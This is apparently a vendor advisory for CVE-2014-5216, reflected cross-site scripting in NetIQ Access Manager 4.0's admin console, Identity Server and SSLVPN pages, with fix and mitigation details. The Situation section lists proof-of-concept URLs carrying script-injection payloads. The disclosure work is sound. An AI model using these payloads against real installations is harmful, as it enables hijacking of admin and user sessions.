Reflected Cross Site Scripting (XSS) vulnerability against multiple Access Manager User interfaces allowing effective attacks of Admin Console, Identity Server and SSLVPN sessions - CVE-2014-5216

  • 7015994
  • 15-Dec-2014
  • 17-Dec-2014

Environment

NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF 2 applied
NetIQ Access Manager 4.0 Admin Console server
NetIQ Access Manager 4.0 Identity Server
NetIQ Access Manager 4.0 SSLVPN server
CVE-2014-5216

Situation

The following URLs demonstrate different Reflected Cross Site Scripting (XSS) flaws in the administration interface and the user interface of Access Manager 4.0.

// Admin Console Server
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'

https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

// Identity Server
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

// SSLVPN Server
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Resolution

Apply Access Manager 4.0.1 HF3 to address all the above issues except for the following two URLs:

# https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
# https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

The cross site scripting for these two iManager URLs require that the admin user be logged in before accessing these URLs for the vulnerability to happen. As a best practice, the Administrator of an Access Management solution should avoid browsing sites in the same browser that is being used to manage the NAM setup. Although viewed as a lower priority vulnerability, the NAM team nevertheless plans to fix this in the next release of the product (NAM 4.1).

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.

 

Feedback service temporarily unavailable. For content questions or problems, please contact Support.